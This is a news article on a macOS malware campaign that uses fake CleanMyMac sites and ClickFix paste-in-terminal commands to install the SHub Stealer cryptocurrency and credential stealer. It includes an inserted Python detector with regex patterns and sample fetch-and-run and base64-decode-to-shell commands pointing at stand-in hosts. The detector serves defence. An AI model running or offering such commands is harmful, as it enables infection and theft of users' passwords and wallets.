Mac OS Targeted in Malware Campaign Stealing Cryptocurrency from Users

By Thomas | Published on March 8, 2026

News

Cybercriminals have started targeting Mac users with a fake CleanMyMac campaign that distributes advanced malware capable of stealing cryptocurrency. Apple long marketed Macs as the safer option compared to Windows, and to an extent that was true, though not because macOS was better fortified or better built, but because it was a much smaller target. While Macs do have features that can put them ahead of Windows, they can still be just as vulnerable to malware and other types of attacks.

How It Works

Malwarebytes was the first to break the news after discovering the malicious campaign online. The threat actors have set up fake CleanMyMac websites that mimic the original, trusted software’s site. These websites are then distributed, primarily through malicious ad campaigns. To install the software, the website instructs users to open the terminal and paste a provided command.

Once a user runs the provided command, the malware installs itself using a technique called ClickFixing, which is commonly used by similar malware targeting Macs. The terminal command makes it appear as if the software is being downloaded from a trusted source, when in reality it decodes an encoded link to the real destination, then pulls a shell script from the attacker's servers and executes it directly. To the user it may not seem like much is happening, when in fact their system has been infected.
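The defensive counterpart to the installation step described above is spotting the command pattern itself: a base64 blob decoded and handed to a shell, or a remote fetch piped straight into an interpreter. The following is an added example, not code from Malwarebytes or from the article, and the shell-history lines it scans are constructed for illustration (the encoded URL uses the reserved `.invalid` domain, so it resolves nowhere). The heuristics are assumptions about the general ClickFix shape, not the exact command used in this campaign.

```python
import base64
import binascii
import re

# Heuristics for ClickFix-style one-liners (assumed patterns, not this campaign's exact command).
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
DECODE_TO_SHELL = re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(sh|bash|zsh)\b")
SUBST_DECODE = re.compile(r"\b(sh|bash|zsh)\s+-c\s+.*base64\s+(-d|--decode|-D)")
FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b")
URL = re.compile(r"https?://\S+")


def decode_embedded_urls(command):
    """Try to base64-decode every long blob in the command and return any URLs found inside."""
    urls = []
    for match in BASE64_BLOB.finditer(command):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8", "ignore")
        except (binascii.Error, ValueError):
            continue  # not valid base64, e.g. a long hash or token
        urls.extend(URL.findall(text))
    return urls


def classify(command):
    """Return a list of human-readable findings for one command line (empty if it looks benign)."""
    findings = []
    if DECODE_TO_SHELL.search(command) or SUBST_DECODE.search(command):
        findings.append("base64-decoded content piped to shell")
    if FETCH_TO_SHELL.search(command):
        findings.append("remote fetch piped to shell")
    urls = decode_embedded_urls(command)
    if urls:
        findings.append("encoded url: " + ", ".join(urls))
    return findings


def scan(lines):
    """Map each suspicious line to its findings; benign lines are omitted."""
    report = {}
    for line in lines:
        findings = classify(line)
        if findings:
            report[line] = findings
    return report


# Constructed sample standing in for a user's shell history (not real campaign data).
ENCODED = base64.b64encode(b"https://updates.example.invalid/install.sh").decode()
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    f"echo {ENCODED} | base64 -d | sh",                     # hidden destination, decoded then run
    "curl -fsSL https://example.invalid/setup.sh | bash",   # fetch-and-run
    "git commit -m 'fix typo'",
]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_HISTORY).items():
        print(line)
        for finding in findings:
            print("   ->", finding)
```

The decode step is what makes the check useful for triage: a flagged line is reported together with the real destination hidden inside the blob, which is exactly the piece the on-screen command is designed to conceal from the user.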

What Can It Do?

The malware, called SHub Stealer, automatically detects and steals a wide range of valuable information. This includes Apple Keychain data, which holds the user's saved passwords, browser data along with active sessions, Telegram sessions, and, most importantly, wallet files and ledgers containing any recovery seeds or phrases. SHub performs systematic sweeps of an infected machine, searching for any data that could be of value to the attackers.

Excluding Russians

Before the malware installs its malicious payload, it checks whether the system has a Russian language setting or keyboard layout installed. If it does, the malware sends a "cis_blocked" event to the attackers' servers and kills the process. Reportedly, this tactic is commonly employed by Russian-speaking cybercriminal groups to avoid attracting law enforcement attention in the region.

Conclusion

Unfortunately, it feels like we're living in an era where malware is just as prevalent as it was in the early 2000s. Big tech corporations often employ poor vetting processes, allowing malware to appear at the top of major search engine results and infect unsuspecting users through this and similar campaigns. This event also puts another nail in the coffin of the illusion, which some people still hold, that Macs are the safer alternative, an illusion that leads them to be more negligent with their security as a result.
